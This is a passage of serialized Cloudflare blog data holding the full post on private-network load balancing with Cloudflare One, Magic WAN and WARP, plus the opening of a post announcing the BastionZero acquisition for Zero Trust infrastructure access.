Mahan"],"slug":[0,"corey-mahan"],"bio":[0,null],"profile_image":[0,"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/rO7Nrs04WulaUyysGKjYg/460181b0382fae4856241497c97fbd22/corey-mahan.png"],"location":[0,null],"website":[0,null],"twitter":[0,"@coreymahan"],"facebook":[0,null]}],[0,{"name":[0,"Andrew Meyer"],"slug":[0,"andrew-meyer"],"bio":[0,null],"profile_image":[0,"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6Jff1jGQVWZWRwM9YtLR5Z/403d9a921ee45af3bbfd7513df03a41d/andrew-meyer.jpg"],"location":[0,"Seattle"],"website":[0,null],"twitter":[0,null],"facebook":[0,null]}],[0,{"name":[0,"Ayush Kumar"],"slug":[0,"ayush"],"bio":[0,null],"profile_image":[0,"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/16XufphFwxLrjgrc4HQd5K/31b6f03b182f3fd13f09ad34ad9de18c/ayush.png"],"location":[0,null],"website":[0,null],"twitter":[0,null],"facebook":[0,null]}],[0,{"name":[0,"Michael Mcgrory"],"slug":[0,"michael-mcgrory"],"bio":[0],"profile_image":[0,"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3TJXyOr6bfJxs9wLgGhNLJ/7390ade203c6edfe974e0dc57e2ace66/_tmp_mini_magick20231129-2-1o9ova9.jpg"],"location":[0],"website":[0],"twitter":[0],"facebook":[0]}],[0,{"name":[0,"Gavin Chen"],"slug":[0,"gavin"],"bio":[0,null],"profile_image":[0,"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6nfAuFZQX9r4tGd5uG73zH/77abec6a219f147eb78d69353fb6f019/gavin.png"],"location":[0,"Burlingame, CA"],"website":[0,null],"twitter":[0,null],"facebook":[0,null]}]]],"meta_description":[0,"This post explains how our integrations with CrowdStrike Falcon® Next-Gen SIEM allow customers to identify and investigate risky user behavior and analyze data combined with other log sources to uncover hidden threats."],"primary_author":[0,{}],"localeList":[0,{"name":[0,"Loc: Customers get increased integration with Cloudflare Email Security and Zero Trust through expanded partnership with CrowdStrike (CN,TW)"],"enUS":[0,"English for Locale"],"zhCN":[0,"Translated for Locale"],"zhHansCN":[0,"No Page for Locale"],"zhTW":[0,"Translated for Locale"],"frFR":[0,"No Page for Locale"],"deDE":[0,"No Page for Locale"],"itIT":[0,"No Page for Locale"],"jaJP":[0,"No Page for Locale"],"koKR":[0,"No Page for Locale"],"ptBR":[0,"No Page for Locale"],"esLA":[0,"No Page for Locale"],"esES":[0,"No Page for Locale"],"enAU":[0,"No Page for Locale"],"enCA":[0,"No Page for Locale"],"enIN":[0,"No Page for Locale"],"enGB":[0,"No Page for Locale"],"idID":[0,"No Page for Locale"],"ruRU":[0,"No Page for Locale"],"svSE":[0,"No Page for Locale"],"viVN":[0,"No Page for Locale"],"plPL":[0,"No Page for Locale"],"arAR":[0,"No Page for Locale"],"nlNL":[0,"No Page for Locale"],"thTH":[0,"No Page for Locale"],"trTR":[0,"No Page for Locale"],"heIL":[0,"No Page for Locale"],"lvLV":[0,"No Page for Locale"],"etEE":[0,"No Page for Locale"],"ltLT":[0,"No Page for Locale"]}],"url":[0,"https://blog.cloudflare.com/customers-get-increased-integration-with-cloudflare-email-security-and-zero-trust"],"metadata":[0,{"title":[0,"Customers get increased integration with Cloudflare Email Security and Zero Trust through expanded partnership with CrowdStrike"],"description":[0,"This post explains how our integrations with CrowdStrike Falcon® Next-Gen SIEM allow customers to identify and investigate risky user behavior and analyze data combined with other log sources to uncover hidden threats. "],"imgPreview":[0,"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/R8b3OcIJSR4gWYdssurUZ/8492cd1dbf0d9518637d6b25c0c22d1e/Customers_get_increased_integration_with_Cloudflare_Email_Security_and_Zero_Trust_through_expanded_partnership_with_CrowdStr.png"]}]}],[0,{"id":[0,"1yN3NeaPbXuFjUrmpQeDhV"],"title":[0,"Eliminating hardware with Load Balancing and Cloudflare One"],"slug":[0,"eliminating-hardware-with-load-balancing-and-cloudflare-one"],"excerpt":[0,"Cloudflare is adding support for end-to-end private traffic flows to our local traffic management (LTM) load balancing solution, and allowing for the replacement of hardware load balancers"],"featured":[0,false],"html":[0,"\n <figure class=\"kg-card kg-image-card \">\n \n <Image src=\"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2aNH895jeZiW7yGCRLa1gc/e8136c82ff4b7e60b2de57abd71b72b6/Load-balancing---Cloudflare-One-1.png\" alt=\"Eliminating hardware with Load Balancing and Cloudflare One\" class=\"kg-image\" width=\"2401\" height=\"1350\" loading=\"lazy\"/>\n \n </figure><p>In 2023, Cloudflare <a href=\"https://blog.cloudflare.com/elevate-load-balancing-with-private-ips-and-cloudflare-tunnels-a-secure-path-to-efficient-traffic-distribution/\"><u>introduced a new load balancing solution</u></a> supporting Private Network Load Balancing. This year, we took it a step further by introducing support for <a href=\"https://blog.cloudflare.com/extending-local-traffic-management-load-balancing-to-layer-4-with-spectrum/\"><u>layer 4 load balancing to private networks via Spectrum</u></a>. Now, organizations can seamlessly balance public HTTP(S), TCP, and UDP traffic to their privately hosted applications. Today, we’re thrilled to unveil our latest enhancement: support for end-to-end private traffic flows as well as WARP authenticated device traffic, eliminating the need for dedicated hardware load balancers! These groundbreaking features are powered by the enhanced integration of <a href=\"https://www.cloudflare.com/application-services/products/load-balancing/\"><u>Cloudflare load balancing</u></a> with our Cloudflare One platform, and are available to our enterprise customers. With this upgrade, our customers can now utilize Cloudflare load balancers for both public and private traffic directed at private networks.</p>\n <div class=\"flex anchor relative\">\n <h3 id=\"cloudflare-load-balancing-today\">Cloudflare Load Balancing today</h3>\n <a href=\"#cloudflare-load-balancing-today\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n <p>Before discussing the new features, let&#39;s review Cloudflare&#39;s existing load balancing support and the challenges customers face.</p><p>Cloudflare currently supports four main load balancing traffic flows:</p><ol><li><p>Internet-facing load balancers connecting to <b>publicly</b> accessible endpoints at layer 7, supporting HTTP(S).</p></li><li><p>Internet-facing load balancers connecting to <b>publicly</b> accessible endpoints at layer 4 (Spectrum), supporting TCP and UDP services</p></li><li><p>Internet-facing load balancers connecting to <b>private</b> endpoints at layer 7 HTTP(S) via Cloudflare Tunnels.</p></li><li><p>Internet-facing load balancers connecting to <b>private</b> endpoints at layer 4 (Spectrum), supporting TCP and UDP services via Cloudflare Tunnels.</p></li></ol>\n <figure class=\"kg-card kg-image-card \">\n \n <Image src=\"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/37XvcgIiO2eVu1DtYJMDae/8409b6ae682fe57f2f0c67bed2e35d7a/image3-10.png\" alt=\"\" class=\"kg-image\" width=\"1999\" height=\"976\" loading=\"lazy\"/>\n \n </figure><p>One of the biggest advantages of Cloudflare’s load balancing solutions is the elimination of hardware costs and maintenance. Unlike hardware-based load balancers, which are costly to purchase, license, operate, and upgrade, Cloudflare’s solution requires no hardware. There&#39;s no need to buy additional modules or new licenses, and you won&#39;t face end-of-life issues with equipment that necessitate costly replacements.</p><p>With Cloudflare, you can focus on innovation and growth. <a href=\"https://www.cloudflare.com/learning/performance/what-is-load-balancing/\">Load balancers</a> are deployed in every Cloudflare data center across the globe, in over 300 cities, providing virtually unlimited scale and capacity. You never need to worry about bandwidth constraints, deployment locations, extra hardware modules, downtime, upgrades, or supply chain constraints. Cloudflare’s global <a href=\"https://www.cloudflare.com/learning/cdn/glossary/anycast-network/\">Anycast</a> network ensures that every customer connects to a nearby data center and load balancer, where policies, rules, and steering are applied efficiently. And now, the resilience, scale, and simplicity of Cloudflare load balancers can be integrated into your private networks! We have worked hard to ensure that Cloudflare load balancers are highly available and disaster ready, from the core to the edge – <a href=\"/major-data-center-power-failure-again-cloudflare-code-orange-tested/\">even when datacenters lose power</a>.</p>\n <div class=\"flex anchor relative\">\n <h3 id=\"keeping-private-resources-private-with-magic-wan\">Keeping private resources private with Magic WAN</h3>\n <a href=\"#keeping-private-resources-private-with-magic-wan\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n <p>Before today&#39;s announcement, all of Cloudflare&#39;s load balancers operating at layer 4 have been connected to the public Internet. Customers have been able to secure the traffic flowing to their load balancers with WAF rules and Zero Trust policies, but some customers would prefer to keep certain resources private and under no circumstances exposed to the Internet. It’s been possible to isolate origin servers and endpoints this way, which can exist on private networks that are only accessible via <a href=\"https://www.cloudflare.com/products/tunnel/\">Cloudflare Tunnels</a>. And as of today, we can offer a similar level of isolation to customers’ layer 4 load balancers.</p><p><a href=\"/elevate-load-balancing-with-private-ips-and-cloudflare-tunnels-a-secure-path-to-efficient-traffic-distribution/\">In our previous blog post</a>, we discussed connecting these internal or private resources to the Cloudflare global network and how Cloudflare would soon introduce load balancers that are accessible via private IP addresses. Unlike other Cloudflare load balancers, these do not have an associated hostname. Rather, they are accessible via an <a href=\"https://datatracker.ietf.org/doc/html/rfc1918\">RFC 1918</a> private IP address. In the land of load balancers, this is often referred to as a virtual IP (VIP). As of today, load balancers that are accessible at private IPs can now be used within a virtual network to isolate traffic to a certain set of Cloudflare tunnels, enabling customers to load balance traffic within their private network without exposing applications to the public Internet.</p><p>The question you might be asking is, “If I have a private IP load balancer and privately hosted applications, how do I or my users actually reach these now-private services?”</p><p><a href=\"https://www.cloudflare.com/network-services/products/magic-wan/\">Cloudflare Magic WAN</a> can now be used as an on-ramp in tandem with Cloudflare load balancers that are accessible via an assigned private IP address. Magic WAN provides a secure and high-performance connection to internal resources, ensuring that traffic remains private and optimized across our global network. With Magic WAN, customers can connect their corporate networks directly to Cloudflare&#39;s global network with <a href=\"https://www.cloudflare.com/learning/network-layer/what-is-gre-tunneling/\">GRE</a> or <a href=\"https://www.cloudflare.com/learning/network-layer/what-is-ipsec/\">IPSec</a> tunnels, maintaining privacy and security while enjoying seamless connectivity. The Magic WAN Connector easily establishes connectivity to Cloudflare without the need to configure network gear, and it can be deployed at any physical or cloud location! With the enhancements to Cloudflare’s load balancing solution, customers can confidently keep their corporate applications resilient while maintaining the end-to-end privacy and security of their resources.</p><p>This enhancement opens up numerous use cases for internal load balancing, such as managing traffic between different data centers, efficiently routing traffic for internally hosted applications, optimizing resource allocation for critical applications, and ensuring high availability for internal services. Organizations can now replace traditional hardware-based load balancers, reducing complexity and lowering costs associated with maintaining physical infrastructure. By leveraging Cloudflare load balancing and Magic WAN, companies can achieve greater flexibility and scalability, adapting quickly to changing network demands without the need for additional hardware investments.</p>\n <figure class=\"kg-card kg-image-card \">\n \n <Image src=\"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/70wo9SnF4FzjaQJpqcddUQ/344b162093a4686c6bb86e4369ffff01/image2-6.png\" alt=\"\" class=\"kg-image\" width=\"1160\" height=\"560\" loading=\"lazy\"/>\n \n </figure><p>But what about latency? Load balancing is all about keeping your applications resilient and performant and Cloudflare was built with <a href=\"/recapping-speed-week-2023/\">speed at its core</a>. There is a Cloudflare datacenter within 50ms of 95% of the Internet-connected population globally! Now, we support all Cloudflare One on-ramps to not only provide seamless and secure connectivity, but also to dramatically reduce latency compared to legacy solutions. Load balancing also works seamlessly with <a href=\"https://www.cloudflare.com/application-services/products/argo-smart-routing/\">Argo Smart Routing</a> to intelligently route around network congestion to improve your application performance by up to 30%! Check out the blogs <a href=\"/magic-makes-your-network-faster/\">here</a> and <a href=\"/the-zero-trust-platform-built-for-speed\">here</a> to read more about how Cloudflare One can reduce application latency.</p>\n <div class=\"flex anchor relative\">\n <h3 id=\"supporting-distributed-users-with-cloudflare-warp\">Supporting distributed users with Cloudflare WARP</h3>\n <a href=\"#supporting-distributed-users-with-cloudflare-warp\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n <p>But what about when users are distributed and not connected to the local corporate network? <a href=\"https://developers.cloudflare.com/cloudflare-one/connections/connect-devices/warp/\">Cloudflare WARP</a> can now be used as an on-ramp to reach Cloudflare load balancers that are configured with private IP addresses. The Cloudflare WARP client allows you to protect corporate devices by securely and privately sending traffic from those devices to Cloudflare’s global network, where Cloudflare Gateway can apply advanced web filtering. The WARP client also makes it possible to apply advanced <a href=\"https://www.cloudflare.com/learning/security/glossary/what-is-zero-trust/\">Zero Trust</a> policies that check a device’s health before it connects to corporate applications.</p>\n <figure class=\"kg-card kg-image-card \">\n \n <Image src=\"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5q6TyuYcWbbbFdPere5Ib/b14bb1820ee05ea4d89fb392879f8d90/image1-10.png\" alt=\"\" class=\"kg-image\" width=\"1999\" height=\"963\" loading=\"lazy\"/>\n \n </figure><p>In this load balancing use case, WARP pairs up perfectly with <a href=\"https://developers.cloudflare.com/cloudflare-one/connections/connect-networks/\">Cloudflare Tunnels</a> so that customers can place their private origins within virtual networks to help either isolate traffic or handle overlapping private IP addresses. Once these virtual networks are defined, administrators can configure WARP profiles to allow their users to connect to the proper virtual networks. Once connected, WARP takes the configuration of the virtual networks and installs routes on the end users’ devices. These routes will tell the end user’s device how to reach the Cloudflare load balancer that was created with a private, non-publicly routable IP address. The administrator could then create a <a href=\"https://www.cloudflare.com/learning/dns/dns-records/\">DNS record</a> locally that would point to that private IP address. Once DNS resolves locally, the device would route all subsequent traffic over the WARP connection. This is all seamless to the user and occurs with minimal latency.</p>\n <div class=\"flex anchor relative\">\n <h3 id=\"how-we-connected-load-balancing-to-cloudflare-one\">How we connected load balancing to Cloudflare One</h3>\n <a href=\"#how-we-connected-load-balancing-to-cloudflare-one\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n <p>In contrast to public L4 or L7 load balancers, private L4 load balancers are not going to have publicly addressable hostnames or IP addresses, but we still need to be able to handle their traffic. To make this possible, we had to integrate existing load balancing services with private networking services created by our Cloudflare One team. To do this, upon creation of a private load balancer, we now assign a private IP address within the customer&#39;s virtual network. When traffic destined for a private load balancer enters Cloudflare, our private networking services make a request to load balancing to determine which endpoint to connect to. The information in the response from load balancing is used to connect directly to a privately hosted endpoint via a variety of secure traffic off-ramps. This differs significantly from our public load balancers where traffic is off-ramped to the public internet. In fact, we can now direct traffic from any on-ramp to any off-ramp! This allows for significant flexibility in architecture. For example, not only can we direct WARP traffic to an endpoint connected via GRE or IPSec, but we can also off-ramp this traffic to Cloudflare Tunnel, a CNI connection, or out to the public internet! Now, instead of purchasing a bespoke load balancing solution for each traffic type, like an application or network load balancer, you can configure a single load balancing solution to handle virtually any permutation of traffic that your business needs to run!</p>\n <div class=\"flex anchor relative\">\n <h3 id=\"getting-started-with-internal-load-balancing\">Getting started with internal load balancing</h3>\n <a href=\"#getting-started-with-internal-load-balancing\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n <p>We are excited to be releasing these new load balancing features that solve critical connectivity issues for our customers and effectively eliminate the need for a hardware load balancer. Cloudflare load balancers now support end-to-end private traffic flows with Cloudflare One. To get started with configuring this feature, take a look at our <a href=\"https://developers.cloudflare.com/load-balancing/\">load balancing documentation</a>.</p><p>We are just getting started with our local traffic management load balancing support. There is so much more to come including user experience changes, enhanced layer 4 session affinity, new steering methods, refined control of egress ports, and more.</p>"],"published_at":[0,"2024-07-16T14:02:00.000+01:00"],"updated_at":[0,"2024-12-13T20:38:03.533Z"],"feature_image":[0,"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3odqfUh6G0hF8exiysiB5b/36812a9c28fef2421e0ac0802a22864c/eliminating-hardware-with-load-balancing-and-cloudflare-one.png"],"tags":[1,[[0,{"id":[0,"4Z2oveL0P0AeqGa5lL4Vo1"],"name":[0,"Cloudflare One"],"slug":[0,"cloudflare-one"]}],[0,{"id":[0,"7r0zxUQ3XCgTw2blCdlw55"],"name":[0,"Magic WAN"],"slug":[0,"magic-wan"]}],[0,{"id":[0,"3Jybo7s9hP1t73fq6i4ZWO"],"name":[0,"WARP"],"slug":[0,"warp"]}],[0,{"id":[0,"2UI24t7uddD0CIIUJCu1f4"],"name":[0,"SASE"],"slug":[0,"sase"]}],[0,{"id":[0,"z8ZZrDbXCT44IU6BaHLWl"],"name":[0,"Load Balancing"],"slug":[0,"loadbalancing"]}],[0,{"id":[0,"J61Eszqn98amrYHq4IhTx"],"name":[0,"Zero Trust"],"slug":[0,"zero-trust"]}],[0,{"id":[0,"1ffv1vW4BzGcbQOa9xbY4O"],"name":[0,"Hardware"],"slug":[0,"hardware"]}]]],"relatedTags":[0],"authors":[1,[[0,{"name":[0,"Noah Crouch"],"slug":[0,"noah-crouch"],"bio":[0,null],"profile_image":[0,"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3FtlOVg5w39MFnhnwcZ3qS/0c3fc43d2237614ffca70dcae66d62c9/noah-crouch.jpg"],"location":[0,null],"website":[0,null],"twitter":[0,null],"facebook":[0,null]}]]],"meta_description":[0,"Cloudflare is adding support for end-to-end private traffic flows to our local traffic management (LTM) load balancing solution, and allowing for the replacement of hardware load balancers"],"primary_author":[0,{}],"localeList":[0,{"name":[0,"Eliminating hardware with Load Balancing and Cloudflare One Config"],"enUS":[0,"English for Locale"],"zhCN":[0,"No Page for Locale"],"zhHansCN":[0,"No Page for Locale"],"zhTW":[0,"No Page for Locale"],"frFR":[0,"No Page for Locale"],"deDE":[0,"No Page for Locale"],"itIT":[0,"No Page for Locale"],"jaJP":[0,"No Page for Locale"],"koKR":[0,"No Page for Locale"],"ptBR":[0,"No Page for Locale"],"esLA":[0,"No Page for Locale"],"esES":[0,"No Page for Locale"],"enAU":[0,"No Page for Locale"],"enCA":[0,"No Page for Locale"],"enIN":[0,"No Page for Locale"],"enGB":[0,"No Page for Locale"],"idID":[0,"No Page for Locale"],"ruRU":[0,"No Page for Locale"],"svSE":[0,"No Page for Locale"],"viVN":[0,"No Page for Locale"],"plPL":[0,"No Page for Locale"],"arAR":[0,"No Page for Locale"],"nlNL":[0,"No Page for Locale"],"thTH":[0,"No Page for Locale"],"trTR":[0,"No Page for Locale"],"heIL":[0,"No Page for Locale"],"lvLV":[0,"No Page for Locale"],"etEE":[0,"No Page for Locale"],"ltLT":[0,"No Page for Locale"]}],"url":[0,"https://blog.cloudflare.com/eliminating-hardware-with-load-balancing-and-cloudflare-one"],"metadata":[0,{"title":[0,"Eliminating hardware with Load Balancing and Cloudflare One"],"description":[0,"Cloudflare is adding support for end-to-end private traffic flows to our local traffic management (LTM) load balancing solution, and allowing for the replacement of hardware load balancers"],"imgPreview":[0,"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/37lXM5RDwMXpLgJxa1wYDD/7199707238e9293a3e99ddf3a15f09b9/eliminating-hardware-with-load-balancing-and-cloudflare-one-jFdXH4.png"]}]}],[0,{"id":[0,"7J3IpMFd3rIppWBtB8bsZN"],"title":[0,"Cloudflare acquires BastionZero to extend Zero Trust access to IT infrastructure"],"slug":[0,"cloudflare-acquires-bastionzero"],"excerpt":[0,"We’re excited to announce that BastionZero, a Zero Trust infrastructure access platform, has joined Cloudflare. This acquisition extends our Zero Trust Network Access (ZTNA) flows with native access management for infrastructure like servers, Kubernetes clusters, and databases"],"featured":[0,false],"html":[0,"<p></p>\n <figure class=\"kg-card kg-image-card \">\n \n <Image src=\"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2E6zva5okgz900pNPFVvAq/c02581e741bbbb4efbf9c4d7014c5a13/fVdKbi95022g-2kobkGUO3seClXae9aVb70mIrk6ysHISomy-fTXGFtHrbJUOicul9IHXrb_6CIae0kUjguj8zJ5nrBbVTjDOgDvCEDEgGExgoRUBeEEXkMqolaz.png\" alt=\"\" class=\"kg-image\" width=\"1600\" height=\"900\" loading=\"lazy\"/>\n \n </figure><p>We’re excited to <a href=\"https://www.cloudflare.com/press-releases/2024/cloudflare-acquires-bastionzero-to-add-zero-trust-infrastructure-access/\">announce</a> that <a href=\"https://www.bastionzero.com/\">BastionZero</a>, a Zero Trust infrastructure access platform, has joined Cloudflare. This acquisition extends our Zero Trust Network Access (ZTNA) flows with native access management for infrastructure like servers, Kubernetes clusters, and databases.</p><p>Security teams often prioritize application and Internet access because these are the primary vectors through which users interact with corporate resources and external threats infiltrate networks. Applications are typically the most visible and accessible part of an organization&#39;s digital footprint, making them frequent targets for cyberattacks. Securing application access through methods like Single Sign-On (SSO) and Multi-Factor Authentication (MFA) can yield immediate and tangible improvements in user security.</p><p>However, infrastructure access is equally critical and many teams still rely on <a href=\"https://www.cloudflare.com/learning/access-management/castle-and-moat-network-security/\">castle-and-moat</a> style network controls and local resource permissions to protect infrastructure like servers, databases, Kubernetes clusters, and more. This is difficult and fraught with risk because the security controls are fragmented across hundreds or thousands of targets. Bad actors are increasingly focusing on targeting infrastructure resources as a way to take down huge swaths of applications at once or steal sensitive data. We are excited to extend Cloudflare One’s Zero Trust Network Access to natively protect infrastructure with user- and device-based policies along with multi-factor authentication.</p>\n <div class=\"flex anchor relative\">\n <h2 id=\"application-vs-infrastructure-access\">Application vs. infrastructure access</h2>\n <a href=\"#application-vs-infrastructure-access\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n <p>Application access typically involves interacting with web-based or client-server applications. These applications often support modern authentication mechanisms such as Single Sign-On (SSO), which streamline user authentication and enhance security. SSO integrates with identity providers (IdPs) to offer a seamless and secure login experience, reducing the risk of password fatigue and credential theft.</p><p>Infrastructure access, on the other hand, encompasses a broader and more diverse range of systems, including servers, databases, and network devices. These systems often rely on protocols such as SSH (Secure Shell), RDP (Remote Desktop Protocol), and Kubectl (Kubernetes) for administrative access. The nature of these protocols introduces additional complexities that make securing infrastructure access more challenging.</p><ul><li><p><b>SSH Authentication:</b> SSH is a fundamental tool for accessing Linux and Unix-based systems. SSH access is typically facilitated through public key authentication, through which a user is issued a public/private key pair that a target system is configured to accept. These keys must be distributed to trusted users, rotated frequently, and monitored for any leakage. If a key is accidentally leaked, it can grant a bad actor direct control over the SSH-accessible resource.</p></li><li><p><b>RDP Authentication:</b> RDP is widely used for remote access to Windows-based systems. While RDP supports various authentication methods, including password-based and certificate-based authentication, it is often targeted by brute force and credential stuffing attacks.</p></li><li><p><b>Kubernetes Authentication:</b> Kubernetes, as a container orchestration platform, introduces its own set of authentication challenges. Access to Kubernetes clusters involves managing roles, service accounts, and kubeconfig files along with user certificates.</p></li></ul>\n <div class=\"flex anchor relative\">\n <h2 id=\"infrastructure-access-with-cloudflare-one-today\">Infrastructure access with Cloudflare One today</h2>\n <a href=\"#infrastructure-access-with-cloudflare-one-today\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n <p>Cloudflare One facilitates <a href=\"https://www.cloudflare.com/learning/access-management/what-is-ztna/\">Zero Trust Network Access</a> (ZTNA) for infrastructure resources with an approach superior to traditional VPNs. An administrator can define a set of identity, device, and network-aware policies that dictate if a user can access a specific IP address, hostname, and/or port combination. This allows you to create policies like “Only users in the identity provider group ‘developers’ can access resources over port 22 (default SSH port) in our corporate network,” which is already much finer control than a VPN with basic firewall policies would allow.</p><p>However, this approach still has limitations, as it relies on a set of assumptions about how corporate infrastructure is provisioned and managed. If an infrastructure resource is configured outside of the assumed network structure, e.g. SSH over a non-standard port is allowed, all network-level controls may be bypassed. This leaves only the native authentication protections of the specific protocol protecting that resource and is often how leaked SSH keys or database credentials can lead to a wider system outage or breach.</p><p>Many organizations will leverage more complex network structures like a bastion host model or complex Privileged Access Management (PAM) solutions as an added 